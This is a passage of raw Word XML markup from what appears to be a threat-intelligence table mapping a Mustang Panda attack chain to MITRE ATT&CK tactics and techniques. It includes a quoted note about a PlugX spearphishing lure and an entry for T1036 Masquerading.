          <w:p w14:paraId="5AFAC43C" w14:textId="77777777" w:rsidR="00B14585" w:rsidRDefault="00B14585" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="614706EA" w14:textId="103F73ED" w:rsidR="00B14585" w:rsidRDefault="00B14585" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
            <w:r w:rsidR="003B449B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7CE12608" w14:textId="77777777" w:rsidR="00B14585" w:rsidRDefault="00B14585" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B14585" w:rsidRPr="00B857D7" w14:paraId="1163F1D7" w14:textId="77777777" w:rsidTr="00873778">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="29391129" w14:textId="77777777" w:rsidR="00B14585" w:rsidRDefault="00B14585" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D542345" w14:textId="77777777" w:rsidR="00B14585" w:rsidRDefault="00B14585" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6FD9CB94" w14:textId="77777777" w:rsidR="00B14585" w:rsidRDefault="00B14585" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="42418F5C" w14:textId="77777777" w:rsidR="00B14585" w:rsidRPr="00AC7A85" w:rsidRDefault="00B14585" w:rsidP="00B14585"/>
    <w:p w14:paraId="6825967C" w14:textId="77777777" w:rsidR="00B14585" w:rsidRDefault="00B14585" w:rsidP="00B14585">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818"/>
        <w:gridCol w:w="661"/>
        <w:gridCol w:w="699"/>
        <w:gridCol w:w="557"/>
        <w:gridCol w:w="992"/>
        <w:gridCol w:w="2285"/>
      </w:tblGrid>
      <w:tr w:rsidR="001F3C19" w:rsidRPr="002D1D50" w14:paraId="5764E0D1" w14:textId="77777777" w:rsidTr="007D27AE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="050AF9A1" w14:textId="77777777" w:rsidR="001F3C19" w:rsidRDefault="001F3C19" w:rsidP="001F3C19">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="11173C28" w14:textId="77777777" w:rsidR="001F3C19" w:rsidRPr="002D1D50" w:rsidRDefault="001F3C19" w:rsidP="001F3C19">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Chain_ID</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2818" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="436B7384" w14:textId="093D0AA2" w:rsidR="001F3C19" w:rsidRPr="002D1D50" w:rsidRDefault="001F3C19" w:rsidP="001F3C19">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Mustang_Panda_001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="0C3B7682" w14:textId="77777777" w:rsidR="001F3C19" w:rsidRPr="002D1D50" w:rsidRDefault="001F3C19" w:rsidP="001F3C19">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="603E0DC0" w14:textId="4CC75A0F" w:rsidR="001F3C19" w:rsidRPr="002D1D50" w:rsidRDefault="001F3C19" w:rsidP="001F3C19">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Ver</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="47A26540" w14:textId="16D6D836" w:rsidR="001F3C19" w:rsidRPr="002D1D50" w:rsidRDefault="001F3C19" w:rsidP="001F3C19">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>0.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="3C1334AC" w14:textId="77777777" w:rsidR="001F3C19" w:rsidRPr="002D1D50" w:rsidRDefault="001F3C19" w:rsidP="001F3C19">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2285" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="47D87DF4" w14:textId="77777777" w:rsidR="001F3C19" w:rsidRPr="002D1D50" w:rsidRDefault="001F3C19" w:rsidP="001F3C19">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B14585" w:rsidRPr="002D1D50" w14:paraId="3C47CC5C" w14:textId="77777777" w:rsidTr="007D27AE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="54119056" w14:textId="77777777" w:rsidR="00B14585" w:rsidRPr="002D1D50" w:rsidRDefault="00B14585" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="40DB07FD" w14:textId="77777777" w:rsidR="00B14585" w:rsidRPr="002D1D50" w:rsidRDefault="00B14585" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2818" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2DCE3919" w14:textId="77777777" w:rsidR="00B14585" w:rsidRPr="002D1D50" w:rsidRDefault="00B14585" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5B7132CC" w14:textId="77777777" w:rsidR="00B14585" w:rsidRPr="002D1D50" w:rsidRDefault="00B14585" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="20B69739" w14:textId="77777777" w:rsidR="00B14585" w:rsidRPr="002D1D50" w:rsidRDefault="00B14585" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="17D43AC1" w14:textId="77777777" w:rsidR="00B14585" w:rsidRPr="002D1D50" w:rsidRDefault="00B14585" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="43DEB7CF" w14:textId="77777777" w:rsidR="00B14585" w:rsidRPr="002D1D50" w:rsidRDefault="00B14585" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2285" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="523E54CB" w14:textId="77777777" w:rsidR="00B14585" w:rsidRPr="002D1D50" w:rsidRDefault="00B14585" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B14585" w:rsidRPr="002D1D50" w14:paraId="62400D4E" w14:textId="77777777" w:rsidTr="007D27AE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2977AC61" w14:textId="77777777" w:rsidR="00B14585" w:rsidRPr="002D1D50" w:rsidRDefault="00B14585" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6F1CDF99" w14:textId="77777777" w:rsidR="00B14585" w:rsidRPr="002D1D50" w:rsidRDefault="00B14585" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Tactic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2818" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="41BAF308" w14:textId="77777777" w:rsidR="00B14585" w:rsidRPr="002D1D50" w:rsidRDefault="00B14585" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3C0A5CE3" w14:textId="77777777" w:rsidR="00B14585" w:rsidRPr="002D1D50" w:rsidRDefault="00B14585" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Pred</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="749A4847" w14:textId="77777777" w:rsidR="00B14585" w:rsidRPr="002D1D50" w:rsidRDefault="00B14585" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>TInc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5DD3C780" w14:textId="77777777" w:rsidR="00B14585" w:rsidRDefault="00B14585" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>S/G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="20994F25" w14:textId="77777777" w:rsidR="00B14585" w:rsidRPr="002D1D50" w:rsidRDefault="00B14585" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>KC</w:t>
            </w:r>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Step</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2285" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="347E0985" w14:textId="77777777" w:rsidR="00B14585" w:rsidRPr="002D1D50" w:rsidRDefault="00B14585" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B14585" w:rsidRPr="00B857D7" w14:paraId="4DA9D9E6" w14:textId="77777777" w:rsidTr="007D27AE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4E4B48F2" w14:textId="77777777" w:rsidR="00B14585" w:rsidRPr="00B857D7" w:rsidRDefault="00B14585" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="393A3D10" w14:textId="77777777" w:rsidR="00B14585" w:rsidRPr="00B857D7" w:rsidRDefault="00B14585" w:rsidP="00473869">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818" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0A455DCA" w14:textId="77777777" w:rsidR="00B14585" w:rsidRPr="00B857D7" w:rsidRDefault="00B14585" w:rsidP="00473869">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1" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="222BD318" w14:textId="7AEEEF58" w:rsidR="00B14585" w:rsidRPr="00B857D7" w:rsidRDefault="001D7291" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="064E08DA" w14:textId="77777777" w:rsidR="00B14585" w:rsidRPr="00B857D7" w:rsidRDefault="00B14585" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7AB65175" w14:textId="77777777" w:rsidR="00B14585" w:rsidRPr="00B857D7" w:rsidRDefault="00B14585" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F5FF389" w14:textId="2BDC1E1F" w:rsidR="00B14585" w:rsidRPr="00B857D7" w:rsidRDefault="00992EC7" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-DEL/IF-SEN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2285" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5F0E9653" w14:textId="53259F20" w:rsidR="00B14585" w:rsidRPr="00B857D7" w:rsidRDefault="0001227E" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">[1] The lure document … was used to deliver a customized </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>PlugX</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> payload …. Given that the letter was directly addressed to this individual, it is likely that he was the target </w:t>
            </w:r>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">of a </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>spearphishing</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> attempt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CE0D13" w:rsidRPr="00CC5907" w14:paraId="376B79FA" w14:textId="77777777" w:rsidTr="007D27AE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6B0EBC15" w14:textId="0F05B689" w:rsidR="00CC5907" w:rsidRPr="00CC5907" w:rsidRDefault="00CC5907" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F526326" w14:textId="0DCD10AF" w:rsidR="00CC5907" w:rsidRPr="00CC5907" w:rsidRDefault="00CC5907" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CC5907">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00CC5907">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0005 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00CC5907">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00CC5907">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Defense</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00CC5907">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2818" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="06B2637A" w14:textId="0802211A" w:rsidR="00CC5907" w:rsidRPr="00CC5907" w:rsidRDefault="00CC5907" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1036 Masquerading</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="049EFB6B" w14:textId="11F9794E" w:rsidR="00CC5907" w:rsidRPr="00CC5907" w:rsidRDefault="001D7291" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="621FDEE8" w14:textId="77777777" w:rsidR="00CC5907" w:rsidRPr="00CC5907" w:rsidRDefault="00CC5907" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7BB75C78" w14:textId="7B268191" w:rsidR="00CC5907" w:rsidRPr="00CC5907" w:rsidRDefault="001D7291" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="446360E7" w14:textId="40908835" w:rsidR="00CC5907" w:rsidRPr="00CC5907" w:rsidRDefault="00992EC7" w:rsidP="00473869">
